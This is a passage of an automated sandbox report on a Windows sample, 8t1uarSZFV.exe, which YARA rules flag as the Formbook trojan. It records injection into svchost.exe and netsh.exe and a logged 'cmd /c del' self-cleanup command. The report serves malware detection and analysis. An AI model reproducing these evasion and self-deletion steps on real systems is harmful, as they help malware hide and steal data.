          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036056303_2_03605630
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036716CC3_2_036716CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036775713_2_03677571
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036895C33_2_036895C3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0365D5B03_2_0365D5B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035B14603_2_035B1460
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367F43F3_2_0367F43F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367FB763_2_0367FB76
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03635BF03_2_03635BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035FDBF93_2_035FDBF9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035DFB803_2_035DFB80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03633A6C3_2_03633A6C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03677A463_2_03677A46
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367FA493_2_0367FA49
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0366DAC63_2_0366DAC6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03605AA03_2_03605AA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03661AA33_2_03661AA3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0365DAAC3_2_0365DAAC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C99503_2_035C9950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035DB9503_2_035DB950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_036559103_2_03655910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0362D8003_2_0362D800
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C38E03_2_035C38E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367FF093_2_0367FF09
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03583FD23_2_03583FD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03583FD53_2_03583FD5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C1F923_2_035C1F92
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367FFB13_2_0367FFB1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C9EB03_2_035C9EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03677D733_2_03677D73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035C3D403_2_035C3D40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03671D5A3_2_03671D5A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035DFDC03_2_035DFDC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_03639C323_2_03639C32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0367FCF23_2_0367FCF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095D5933_2_0095D593
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095E7933_2_0095E793
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_00942D903_2_00942D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_00942D883_2_00942D88
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_0095EE2E3_2_0095EE2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_00949E503_2_00949E50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_00942FB03_2_00942FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010CA0363_2_010CA036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C89123_2_010C8912
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C10823_2_010C1082
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C5B303_2_010C5B30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C5B323_2_010C5B32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010CB2323_2_010CB232
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010C2D023_2_010C2D02
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_010CE5CD3_2_010CE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0305F290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03027E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FCB970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0304EA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03015130 appears 58 times
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: String function: 00FA9CB3 appears 31 times
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: String function: 00FC0A30 appears 46 times
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: String function: 00FBF9F2 appears 40 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0362EA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03607E54 appears 107 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 035AB970 appears 262 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 035F5130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0363F290 appears 103 times
          Source: 8t1uarSZFV.exe, 00000000.00000003.1695360405.0000000003AAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8t1uarSZFV.exe
          Source: 8t1uarSZFV.exe, 00000000.00000003.1699765736.0000000003903000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8t1uarSZFV.exe
          Source: 8t1uarSZFV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 8t1uarSZFV.exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7312, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 7396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@11/2
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010137B5 GetLastError,FormatMessageW,0_2_010137B5
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010010BF AdjustTokenPrivileges,CloseHandle,0_2_010010BF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_010016C3
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_010151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_010151CD
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0102A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0102A67C
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_0101648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0101648E
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeCode function: 0_2_00FA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00FA42A2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeFile created: C:\Users\user\AppData\Local\Temp\aut2346.tmpJump to behavior
          Source: 8t1uarSZFV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 8t1uarSZFV.exeReversingLabs: Detection: 55%
          Source: 8t1uarSZFV.exeVirustotal: Detection: 47%
          Source: unknownProcess created: C:\Users\user\Desktop\8t1uarSZFV.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: 8t1uarSZFV.exeStatic file information: File size 1118208 > 1048576
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 8t1uarSZFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: netsh.pdb source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
